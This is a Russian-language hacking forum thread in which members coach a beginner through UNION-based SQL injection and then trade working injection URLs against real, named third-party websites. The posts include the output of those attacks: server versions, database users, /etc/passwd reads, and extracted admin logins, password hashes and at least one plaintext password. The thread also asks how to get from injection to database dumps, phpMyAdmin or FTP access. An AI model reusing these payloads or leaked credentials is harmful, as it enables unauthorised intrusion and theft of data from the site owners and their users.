Ребят, помогите, скуль на запрос "id=9999+union+select+null,null,null/*" выдает такое сообщение - "The used SELECT statements have a different number of columns", а я ЛОХ непойму что делать...
mff количество выводимых полей не подходит. юзай другое. например, select 1,2/* select 1,2,3/* итд. пока не исчезнет эта ошибка. вообще, есть другая тема.
Спасибо Piflit, буду пробывать! Тут вот еще выдали на запрос "id=9999'+union+select+1,2,3/*" - "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' union select 1,2,3/*' at line 1"
ага, убрал ее! но что то никак не выходит, перебираю 1,2,3.. и т.д. php выдаёт "The used SELECT statements have a different number of columns"
Ребят, а что дальше то делать? Ну получил я DATABASE(), USER(), VERSION() и LOAD_FILE('/etc/passwd')! Но что с этим добром делать, мне нужен просто дам базы данных либо вход через phpmyadmin либо аккаунт ftp Помогите плис
мде,искал се сумку в инет шопах,а нашел sql inc=) хотя это и не инет шоп,но все же http://www.classifields.ru/?field=9999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/* 5.1.16-beta catalog1 catalog1@localhost
Ребят а что означает - "Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'" на запрос - "id=9999+union+select+1,2,3,mysql.user.password,5,6,7+from+mysql.user/*" ?
хорош тут уже фигней страдать,сходи почитай статтьи на этом сайте все есть, а вообще вот http://giftman.ru/news_view.php?news_id=9999+union+select+1,2,3,concat_ws(0x2F,user,password),5,6,7+from+mysql.user/*
приглянувшиеся таблицы дима:дима:[email protected] --------------------------------------------------------------------- --------------------------------------------------------------------- БIЗНЕС-ПОРТАЛ CЛАВУТЧИНИ 5.0.22-log:kraibiz@localhost:Comissar42_krai ---------------------------------------------------------------------- --------------------------------------------------------------------- skyinform мы знаем все об авиаперевозах есть доступ к information_schema.tables
Code: http://www.comexus.org.mx/Summer/participants.php?id=-1+union+select+version()/* VERSION: 5.0.27-standard USER: [email protected] DATABASE: cmeadmin_comexusonline PR: 6
Code: http://www.fwbusinesspress.com/frames.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())/* VERSION: 4.0.27-log DATABASE: xbizpress USER: [email protected] PR: 4 *************************************** Всем срочно хостится: Code: http://dimi.pl/regulamin.php?id=-1+union+select+1,concat_ws(version(),database(),user())/* VERSION: 4.1.11-Debian_4sarge8-log DATABASE: usr_sat0_4 USER: sat0@localhost PR: 3 Code: http://dimi.pl/regulamin.php?id=-1+union+select+1,concat(login,char(58),pass)+from+admin/* host247:3727ee3a03fac1457d6aa96e372ada0c
http://www.gamingreport.com/print.php?sid=249729999+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,version(),user())/* сайт кишит sql inc -------- http://www.nfb.ca/sections/thematique.php?id=102+and+substring(version(),1,1)=5/* http://www.worldnetdaily.com/index.php?fa=PAGE.view&pageId=5845899999+UNION+SELECT+1,2,3,4,5,6,7,8/*
Танцивальный клуб "Россис" http://www.rossis.ru/news/?nid=-6+union+select+1,2,concat(table_schema,0x3a,table_name,0x3a,column_name),4,5+from+information_schema.columns+limit+1,1/* http://www.rossis.ru/news/?nid=-6+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat(login,char(58),password),0x71),0x71),4,5+from+titles+limit+0,1/* (Отсутствует вывод ) --------------------------------------------------------------------------------------------- http://www.superpopugai.ru/?page=video&birds_id=79+union+select+1,2,3,4,5,concat(user_name,char(58),user_password,char(58),user_id),7+from+cpg130_users+limit+1,3/* http://www.superpopugai.ru/?page=video&birds_id=79+union+select+1,2,3,4,5,concat(username,char(58),password),7+from+users+limit+0,100/* http://www.superpopugai.ru/?page=video&birds_id=79+union+select+1,2,3,4,5,concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),7+from+INFORMATION_SCHEMA.COLUMNS+limit+0,50000/*
Code: http://www.gykd.co.za/gykd/reviews/bikes.html?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(version(),database(),user()),11,12,13,14,15,16,17,18,19/* DATABASE: gykd VERSION: 4.0.17 USER: web@localhost PR: 2 ****************************** Code: http://www.muzyka.bosko.pl/mp3/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/* DATABASE: boskobosko VERSION: 5.0.44-log USER: [email protected] PR: 4 Code: http://www.muzyka.bosko.pl/mp3/?id=-1+union+select+1,pass,3,4,5,6,login,8,id,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+users+where+id=1/* LOGIN: wrzeszcz PASS: bosko ****************************** поправления к моему посту. Code: http://www.rtp.org/main/index.php?pid=-1+union+select+1,2,3/* Code: http://www.rtp.org/main/index.php?pid=-1+union+select+1,2,concat_ws(version(),database(),user())/* DATABASE: rtf VERSION: 5.0.22 USER: root@localhost PR: 6 Code: http://www.rtp.org/main/index.php?pid=-1+union+select+1,2,concat_ws(0x3a,username,userpassword)+from+user/* carla:52a250762b8d0573 хэш неосилил http://www.rtp.org/admin/loginform.php
http://sanprosvet.ru/ru/page/index.php?id=-3+union+select+1,2,3,4,5,6,7,8,Version(),10,11,12,13,14,15,16,17,18,19,20/* Version 5.27 Фен шуй http://www.fengshuiby.com/ru/page/index.php?id=-8+union+select+1,2,3,4,5,6,7,8,Version(),10,11,12,13,14,15,16,17,18,19,20/* Version 4.1.22-standart User siteis_user@localhost Database siteis_siteis